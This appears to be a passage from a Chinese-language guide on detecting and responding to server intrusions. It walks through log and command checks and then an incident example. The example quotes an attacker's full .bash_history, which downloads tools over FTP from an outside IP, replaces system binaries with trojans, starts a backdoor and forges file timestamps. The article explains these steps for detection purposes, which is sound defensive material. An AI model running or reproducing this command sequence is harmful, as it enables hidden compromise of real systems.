如今一提起电脑入侵、账号泄漏、资料丢失、网页被黑等等各种各样的黑客攻击,大家都是人心惶惶、提心吊胆的。很多人都生怕自己的服务器被入侵者作为攻击的目标,而且一旦被黑客攻入后,多数人也总是手足无措,不知该如何面对和阻挠甚至反击黑客的入侵行为。针对这个普遍的现象,我给大家介绍一下应该采取什么样的措施面对黑客的攻击。
当然首先第
一步,就是要确定你的机器是否真正被黑客攻击了。千万不要盲目地感觉自己的机器有什么异常,就认定是被黑客袭击了。要经过系统全面的入侵检测来确定你的服务器是否正处于黑客的威胁之下。因为对机器进行全面的检测,会浪费很多宝贵的时间和精力,例如有可能是你的服务器出现的异常情况是其自身的配置出现了问题、硬件出现了故障、内部人员的恶作剧或病毒等原因引起的。
当服务器有了异常情况时,最好将上面容易出现的问题先仔细检查一遍,然后再考虑黑客入侵的可能性。这时可以通过检查系统日志、IIS日志、FTP日志等日志记录信息,看一看有没有什么和往常不一样的信息,例如你的服务器如果被黑客用工具扫描,在这些日志里会包含大量的扫描信息和记录,当然也可能会包含黑客的IP地址(如果黑客没有用到傀儡机)。当然除了查看系统日志外,还可以利用安全工具、系统命令来查看和监视黑客的入侵活动。例如安装fport工具,查看系统中对外开放的端口和访问系统的IP信息;例如netstat命令也可查看这些信息。而且在Linux、UNIX系统中,有些功能非常强大的命令,例如:last、history、ps等等,都可以随时查看登录系统的用户和用户登录时使用的IP、运行命令的历史纪录、登录用户开启那些系统进程等敏感的信息。
举个例子来说吧,前几天被朋友邀请去检查一个被“黑客攻击”了的系统,确定是什么导致了入侵以及黑客对系统造成了多大的破坏。幸运的是,这个黑客还不够聪明,没有彻底地把他的行迹清除掉。黑客用缓冲溢出的方法攻击系统中以root权限运行的daemon(实际上这个daemon根本没有必要在系统中运行,而且安装这个Linux系统的人太粗心了没有把它卸载掉,也没有安装Red Hat released updates站点的更新软件包,这个软件包已经解决了缓冲溢出的问题)。不过黑客本身也很粗心,当他成功地在被“黑”的系统中打开一个以“root”权限运行的shell(BASH)之后,他忘了BASH shell会把所有运行过的命令记录到“.bash_history”文件中。只要简单地读一下“/.bash_history”就能发现黑客在系统中到底做了些什么。 那台被“黑客攻击”了的系统中的“.bash_history”文件中记录的命令有这些:
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd 读过这个文件之后,我们就会发现黑客做了:
*在系统中创建了一个目录(/usr/lib/...)。用FTP命令从黑客自己的计算机(200.192.58.201是位于巴西的一个IP地址)上下载一些简单的黑客工具。
*把黑客工具解压,黑客工具包括有特洛伊木马的二进制程序,这些程序将被安装到系统中去。
*用有特洛伊木马的程序覆盖系统中的netstat、ps、tcpd、syslogd和pstree。这些程序都是用来报告系统的情况、显示正在运行的进程、显示已经打开的端口等等。
*留下一个后门程序(/usr/lib/pt07),这程序被安装并启动了。请注意因为黑客已经安装了自己的ps、pstree和netstat,这样后门程序对系统来说是不可见的。
通过上面这样系统全面的入侵检测就可以确定你的服务器是否真的处于黑客的威胁之下了。当然,除了用自己的经验,当然还可以邀请安全专家为你的机器做入侵检测,来找出是否真是黑客在你的服务器中捣乱。
当确定是黑客在攻击你的系统后,接下来第二步吗,当然是要想办法快速及时地阻止黑客的这种违法行为。要想快速阻止黑客的入侵,首先一定要知道黑客是如何入侵的。一份基于网络安全的报告调查称:在互联网上大约有20%的单位曾被黑客侵入;约40%的单位没有安装防火墙(Firewall);不少于30%的黑客入侵事件是在未能正确安装防火墙的情况下发生的(看看你所在的网络环境有没有安装防火墙)。